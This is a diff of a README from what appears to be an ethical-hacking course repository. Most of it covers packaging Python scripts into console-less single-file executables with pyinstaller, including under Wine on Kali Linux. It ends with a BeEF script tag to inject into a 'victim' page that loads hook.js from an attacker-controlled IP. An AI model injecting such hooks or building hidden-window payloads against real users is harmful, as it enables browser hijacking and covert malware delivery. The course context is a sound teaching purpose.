Maffey/ethical-hacking-course/README.md

 `py -<version> <name_of_script_file>`
 where `<version>` can be '2' or '3'.

+#### Packaging scripts into executables
 In order to package Python scripts into executable files, you need to have "pyinstaller" installed and you have to run the following command:
 `pyinstaller <script_name.py> --onefile --noconsole`
-* You might need to use a path to "pyinstaller" instead, if it's not added to PATH.
+* You might need to use a path to pyinstaller instead, if it's not added to PATH.
 * `--onefile` argument ensures all the required libraries and files are put into **single** executable.
 * `--noconsole` argument disables console, so when we run the program, no terminal shows up.
 Please note that some Python scripts may require "stdin", "stdout" and "stderr" to be handled properly (it is handled in our program).
 * The created executable can be found in the "dist" folder.

+If you need to create .exe file from a Linux machine (not recommended - it's better to do it natively), you need a Python interpreter in it's Windows version.
+In order to do that, Wine is required (should be installed by default on Kali Linux).
+After you've got both Python downloaded and Wine installed, type in the following command:
+`wine msiexec /i <python_installer_file>`
+* `msiexec` argument states that we are using a .msi file.
+* `/i` flag means that we want to install said file.

+After the Python installation has been completed, you can now run the interpreter in Windows version using:
+`wine python.exe -m pip install <library>` while in in `.wine/drive_c` and using `pyinstaller` as `<library>`.
+Just like on Windows, the pyinstaller can be found in `drive_c/PythonXX/Scripts` folder.
+Keep in mind that you need to have installed all the libraries your Python scripts use before you can package them.
+Similarly to Windows, in order to package the scripts, the following command needs to be typed in:
+`wine .wine/drive_c/PythonXX/Scripts/pyinstaller.exe <script_name.py> --onefile --noconsole`
+As you can see, this time we do type the whole path to `pyinstaller.exe`.
+<*I'm not sure if it's needed to, perhaps Wine can also simulate adding exe files to PATH.*>
+If you have multiple Python files used in your program, just remember to package the **main** file.
+Pyinstaller will include imported libraries and files accordingly.

 ### BeEF
 The code we want to inject into our victim is:
 `<script src="http://<IP>:3000/hook.js"></script`,